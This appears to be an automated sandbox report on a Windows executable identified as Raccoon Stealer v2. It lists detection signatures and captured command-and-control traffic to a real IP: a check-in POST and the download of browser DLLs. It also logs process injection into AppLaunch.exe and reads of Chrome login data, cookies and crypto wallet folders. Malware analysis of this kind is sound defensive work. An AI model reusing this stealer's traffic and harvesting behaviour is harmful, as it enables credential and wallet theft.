Edit tour

Windows Analysis Report
c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Overview

General Information

Sample Name:	c35d4e641adf21bead54611499c416c8e2de75ac96098.exe
Analysis ID:	682151
MD5:	c5af2b53cf4b8d6177240a822ef6f350
SHA1:	32376015d14f746efa94473a7cb5ca7413f75dbf
SHA256:	c35d4e641adf21bead54611499c416c8e2de75ac9609832d1f32c476140c38d4
Tags:	exeRecordBreaker
Infos:

Detection

Raccoon Stealer v2

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Raccoon Stealer v2

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Snort IDS alert for network traffic

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

DLL side loading technique detected

Contains functionality to inject code into remote processes

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Is looking for software installed on the system

PE file contains an invalid checksum

Drops PE files

Contains functionality to read the PEB

PE / OLE file has an invalid certificate

PE file contains more sections than normal

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

c35d4e641adf21bead54611499c416c8e2de75ac96098.exe (PID: 5796 cmdline: "C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe" MD5: C5AF2B53CF4B8D6177240A822EF6F350)

AppLaunch.exe (PID: 5728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.256216440.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000001.00000003.248184995.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000001.00000003.247123478.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000001.00000003.251086981.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000001.00000003.246414861.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000001.00000002.263653396.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000001.00000003.245521959.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000001.00000003.252997013.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
Click to see the 3 entries

Snort Signatures

ET TROJAN Win32/RecordBreaker CnC Checkin - Source IP: 192.168.2.3 - Destination IP: 89.208.103.4

Timestamp:	192.168.2.389.208.103.449736802036934 08/11/22-06:57:07.043612
SID:	2036934
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response - Source IP: 89.208.103.4 - Destination IP: 192.168.2.3

Timestamp:	89.208.103.4192.168.2.380497362036955 08/11/22-06:57:07.164104
SID:	2036955
Source Port:	80
Destination Port:	49736
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: mozzzzzzzzzzzHost: 89.208.103.4Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 68 61 72 64 7a 26 63 6f 6e 66 69 67 49 64 3d 63 37 38 33 64 31 36 36 64 37 30 66 33 33 32 62 37 32 38 30 33 30 65 38 36 32 62 38 32 39 65 38 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=c783d166d70f332b728030e862b829e8

Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache

Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013C15B2	0_2_013C15B2
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013BFDCC	0_2_013BFDCC
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013BCC58	0_2_013BCC58
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013BFCAC	0_2_013BFCAC
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013B4364	0_2_013B4364
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013BC7C0	0_2_013BC7C0

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Code function: String function: 013B24E0 appears 31 times

Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Static PE information: invalid certificate

Source: sqlite3.dll.1.dr

Static PE information: Number of sections : 18 > 10

Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Virustotal: Detection: 22%

Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe "C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe"
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

File created: C:\Users\user\AppData\LocalLow\nss3.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/12@0/1

Source: softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
Source: sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.1.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Mutant created: \Sessions\1\BaseNamedObjects\iqroq5112542785672901323

Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr
Source:	Binary string: softokn3.pdbp source: softokn3.dll.1.dr
Source:	Binary string: mozglue.pdb@+ source: mozglue.dll.1.dr
Source:	Binary string: nss3.pdb source: nss3.dll.1.dr
Source:	Binary string: mozglue.pdb source: mozglue.dll.1.dr
Source:	Binary string: softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr

Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: sqlite3.dll.1.dr	Static PE information: section name: /4
Source: sqlite3.dll.1.dr	Static PE information: section name: /19
Source: sqlite3.dll.1.dr	Static PE information: section name: /31
Source: sqlite3.dll.1.dr	Static PE information: section name: /45
Source: sqlite3.dll.1.dr	Static PE information: section name: /57
Source: sqlite3.dll.1.dr	Static PE information: section name: /70
Source: sqlite3.dll.1.dr	Static PE information: section name: /81
Source: sqlite3.dll.1.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Code function: 0_2_013B11B0 LoadLibraryA,GetProcAddress,

0_2_013B11B0

Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Static PE information: real checksum: 0x489ec should be: 0x3e27a

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\LocalLow\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\LocalLow\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\LocalLow\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Code function: 0_2_013B8E50 FindFirstFileExW,

0_2_013B8E50

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Code function: 0_2_013B4DC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_013B4DC9

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Code function: 0_2_013B11B0 LoadLibraryA,GetProcAddress,

0_2_013B11B0

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Code function: 0_2_013BAD73 GetProcessHeap,

0_2_013BAD73

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013B599A mov eax, dword ptr fs:[00000030h]	0_2_013B599A
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013BA2CC mov eax, dword ptr fs:[00000030h]	0_2_013BA2CC
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013D8C0C mov eax, dword ptr fs:[00000030h]	0_2_013D8C0C

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013B2412 SetUnhandledExceptionFilter,	0_2_013B2412
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013B2525 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_013B2525
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013B4DC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_013B4DC9
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Code function: 0_2_013B22B0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_013B22B0

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000			Jump to behavior
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 83C008			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A

Jump to behavior

DLL side loading technique detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Users\user\AppData\LocalLow\nss3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Users\user\AppData\LocalLow\mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Windows\SysWOW64\vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Windows\SysWOW64\msvcp140.dll	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Code function: 0_2_013D8C41 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_013D8C41

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Jump to behavior

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Code function: 0_2_013D2F8F cpuid

0_2_013D2F8F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Code function: 0_2_013B219D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_013B219D

Stealing of Sensitive Information

Yara detected Raccoon Stealer v2

Source: Yara match	File source: 00000001.00000003.256216440.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.248184995.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.247123478.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.251086981.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.246414861.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263653396.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.245521959.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.252997013.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected Raccoon Stealer v2

Source: Yara match	File source: 00000001.00000003.256216440.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.248184995.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.247123478.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.251086981.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.246414861.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263653396.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.245521959.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.252997013.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	411 Process Injection	1 Masquerading	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	411 Process Injection	LSASS Memory	2 Security Software Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	23 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	22%	Virustotal		Browse
c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	100%	Avira	HEUR/AGEN.1213126
c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nss3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nss3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	ReversingLabs
